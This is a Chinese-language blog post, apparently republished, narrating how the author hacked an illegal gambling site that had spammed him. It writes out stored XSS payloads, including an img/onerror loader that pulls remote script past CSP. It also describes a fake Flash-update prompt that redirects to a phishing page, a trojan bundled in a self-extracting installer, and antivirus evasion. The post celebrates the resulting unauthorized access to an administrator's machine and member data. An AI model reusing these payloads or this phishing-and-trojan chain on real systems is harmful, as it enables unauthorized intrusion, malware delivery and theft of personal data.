故事的起因

前几天收到一封邮件，内容是这样的：

你说发谁哪里不好，发到我这里来，正好最近辞职了没事干，搞下看看。

加上那个人的好友以后，象征性的聊了几句，大概就是：我说自己因为网赌没钱借了高利贷，让他带我玩这个，好还上贷款，没说几句就给我发了网址和邀请码（这个站没邀请码注册不上），让我去网站里面充钱，我说好，我先去冲一千，完事师傅你一定要好好带我，然后就去注册了（后来我没充钱，他就一直抖我，给我发消息，觉得烦就把他删了，所以聊天记录也没了，简单口述下没截图）。

漏洞挖掘

官网截图

信息收集阶段略过，太麻烦了，有云盾（WAF+CDN），看下面云悉指纹识别的图吧，测试各种功能点，没有结果，不得不说，大部分BC安全都是做的不错的。

想了会，看到一个聊天室功能，进去看看都在说啥，结果发现说话来来回回就那几个人，偶尔有几个和我一样的普通会员，我就感觉，这尼玛是不是托啊，一堆什么导师嚷嚷着跟着下注。

职业习惯：

看见框就想叉，一发xss Payload打过去：

</tExtArEa>'"><sCRiPt sRC=XSSURL></sCrIpT>

wdnmd没反应？明明加载了啊…问了下别的师傅，说这种情况有可能是有CSP，附上相关介绍，我这里就不解释了，本来打算放弃，想了下万一 img 的没有被限制呢。

再吃我一发：

<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';>

叮 ~ 叮 ~ 手机响了，多么美妙的声音，payload成功执行，打来一堆cookie（还是不同域名），然而现实是残酷的，这个站有HttpOnly，cookie不能用，历史密码也没拿到，不过不要灰心，咱还有更猥琐的办法。

Flash钓鱼

既然正面肛不动你，咱就来侧面的。前段时间经常看到无常师傅的flash钓鱼操作，很经典啊，然后就想到自己有天会用到flash官网的钓鱼源码，很早就写好了放在Github上：传送门。

前期准备

一个免费空间，一个免费域名（域名可以搞一个 www.flashxxx.tk 这种的，可信度比较高），一个可以正常上线的马子。

然后xss平台搞个模块，简单解释下代码，一开始重写alert方法并屏蔽网址显示，弹出Flash升级提示，跳转至钓鱼页：

关于马子

可以做到运行正常安装文件的同时运行马子，骚姿势：自解压捆绑文件的利用

为了让自解压的exe文件可以正常运行（已经改成了正常的安装文件图标），必须确保他有解压软件，我就把钓鱼页的自解压文件压缩了下，成了 flashplayerpp_install_cn.zip，这样一来他必须安装解压文件才能打开安装程序，马子自然生效了。

关于免杀

由于技术有限，毕竟咱也不是搞免杀的，生成的马子会被部分杀软报毒，也不知道对面用什么杀软，所以想了个猥琐但有效的办法，其实不少下载站下载的文件也爱这么干，哈哈。

一切就绪

万事俱备，只欠东风，直接发出去刚才写的升级提示+跳转的xss payload：

页面成功弹出提示，对方不点确定页面就一直卡住，点了确定就跳来我的钓鱼页（这里钓鱼页也加了点料，让他点返回时无限回跳钓鱼页）

不过一开始并没有人上线，再点进去一看管理员重置了聊天页的内容。奥利给曾经说过：我们遇到什么困难也不要怕，咱换个号继续叉呗，在间歇性叉叉圈圈了十几次之后，管理员可能是实在忍不住了（管理员：大哥你别弹了，我装还不行嘛），终于运行了我的马子。

成功上线：

这里就上线了一台，不过很幸运，是管理员的机器，不然之前的努力都白费了。

看一会对面在干哈：

这个清楚点，可以看到还依然打开着钓鱼页，俩人还讨论亏钱了，笑死了：

打开了一个账面，这流水咱也看不懂：

再看看有存着啥好东西，两个硬盘一个U盘，C盘E盘没有什么：

F盘里有料了，都是一些会员数据，账单流水，管理后台配置啥的：

点到为止：

不多说了，看了下上线的IP，为了挣钱跑的挺远，老哥背井离乡怪不容易的，祝你安安心心的回到祖国的怀抱过个年吧。。。

文由https://www.se7ensec.cn/2019/12/08/BC%E5%AE%9E%E6%88%98%E4%BB%8EXss%E5%88%B0%E4%B8%BB%E6%9C%BA%E4%B8%8A%E7%BA%BF/